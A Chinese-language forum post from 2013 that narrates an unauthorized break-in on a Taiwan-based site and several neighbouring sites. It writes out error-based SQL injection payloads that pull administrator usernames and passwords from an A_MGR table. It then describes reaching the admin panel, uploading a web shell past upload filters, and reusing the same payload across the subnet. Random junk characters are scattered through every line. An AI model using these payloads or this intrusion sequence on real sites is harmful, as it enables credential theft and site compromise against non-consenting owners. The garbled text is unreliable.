发现一个注入点6 j2 s3 j' D" g6 Q
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389. i* c/ ]" U9 b
* {$ p, r/ F# z& A* D4 ~
习惯性的加’having1=1--- T1 U) d8 N% f6 O! s
% J1 `2 e8 b/ `4 ^: E1 [
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—) B2 A p5 F1 {: a. O) w ~
0 x0 w& Q3 I* N
0; K4 \7 C+ P1 Y- s& U0 q: j8 ]3 O
+ M% J9 J' a7 _* @( M爆出Diary_A.dl_Title(这时候很激动啊)9 T( _1 ?2 t3 g2 o6 Y! @8 L3 Z
! `5 q' }& S7 D" ^4 X那么继续( x( `3 V* M) ?
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—9 l+ @- O8 V# o, r6 D& G" X& x% e
: H7 ~1 P4 _4 v v5 W3 Z' P9 [) l1 l4 T继续,一直爆下去
0 l2 q- |2 j0 O
* }8 \0 p. a# p% A% O7 Z爆到几个字段和表段 但是没找到需要的管理用户的字段: ~" o1 W) H. g
# e7 W. I) Y$ l5 r' `蛋疼了 怎么办 然后去后台登陆页看源码/ }4 f2 f! h% N* Z, Z
' G: o+ v* v' {" ?; e# c
0
! P8 O& Z! s1 F1 @! T1 E* o+ N2 d8 _3 E5 o: `
Input name= “ADUID”
- ]( h# r( Y8 B9 g7 L WInput name= “ADPWD”2 V& R4 h9 m5 o/ x1 A
* k6 e& V+ p& r8 F3 }3 ]3 R
很幸运 找到了字段那就继续
; ^0 \2 j0 }- R$ e0 ]找到之后开始爆用户
8 D6 {+ m l+ _/ z7 y* H' w4 w( uhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—+ u& X5 o; ]- c, l+ Z- b
爆密码
5 a8 x5 s: {5 E# W+ nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
7 Y% B# R7 ]1 _- M" d$ y测试了下 这个注入点只能爆到文章哪里的表 0 _ j1 s0 M) r, N) \
( o/ B# S2 B* ~
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了* p, O/ |# e! R0 l8 u) {/ f
+ L0 _8 m4 d$ g7 V又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
0 [' _ D2 V) m' T6 I3 ~- M# }' ~: _5 |7 l) E3 ^' A$ S8 c
473; ~, T7 M; H. ?' b
" b" T8 I5 V* t; z/ Y; w& l进后台: T( U8 _) H/ A/ d5 l8 N+ U c
~- o" U. |1 T5 J0 ~% u3 l$ j) G" v( {, u9 N
发现几个上传点 有的地方不能上传 而且防止恶意代码
- P; [1 l( S2 H& N; ?! S* }3 j4 q' \. S
没办法 各种百度各种找大牛 找到一只好像可以突破的马% Q$ a8 ~, b9 t h
' E* {; E* b( m+ @7 c7 c9 R n
4 q X5 h: p% y/ }# Q: O$ _在系统管理那里直接上传 不过没有显示地址
3 p7 W% W4 v: ?! c# _! E/ z8 G7 L" r6 W
再上传一次 抓包 搞定OK
4 x+ \ ^0 \2 Z2 C+ x1 w8 e* \ u) ], w3 @
% w7 ~: y A5 y/ Q' H0 v+ A# }* a
1 F' c! a# [% e7 a& o7 B: j472+ Q/ d# x% F* e# U3 V4 i
" F- @5 [: v4 E0 |晚上不行了 去睡觉。。。: x1 N# e* |9 g# Q7 U0 U
第二天刚起床 闲的没事做继续日站吧 - u8 t. x% ^0 Q9 [
2 g* G, x* p5 k& p. u* Z
找个站 就把这个站的旁c扫了下0 e) |4 o' @1 s( s
7 C) L% h( g* O2 w2 [发现c段也有一个购物站 ,然后还和这个站的模板差不多 H) {% n+ M! {- o* l+ K p/ ~5 t
( s; ~8 V) K% N: n% ]1 a' a
就找到会员登录口测试) D" ]6 r3 H7 X7 i: f
4 V# Y) V2 o- T, ]'and (select top 1 MGR_UID from A_MGR)>0—$ n2 n9 g h: J+ ^8 D% g% q4 T2 x
果断爆到了 这时候我很激动 通杀) f0 t4 u" h$ ~. x2 m, y8 G+ E
& m0 c. B6 U* M) a }
再次翻c段5 Z/ s! B- J5 @
1 ^. j* n$ M9 c翻出几个站 都成功拿下: A2 Y2 ^: `! ?+ X4 m3 `
; ?# }9 V/ @. m2 M3 M* K& d7 A
6 [7 R e4 N4 h4 z- i
( c" `" {4 t" X8 E修复方案:
8 W. y; o1 G7 } z) k g5 n他们比我专业
9 f3 T" \* ?! |' l+ _% f# z/ i/ K' L/ m p% G
0 z1 N5 o9 H% R* P& T: i
# P" N. Z. s! |! o |
发表于 2013-4-4 17:40:38
收藏
支持
反对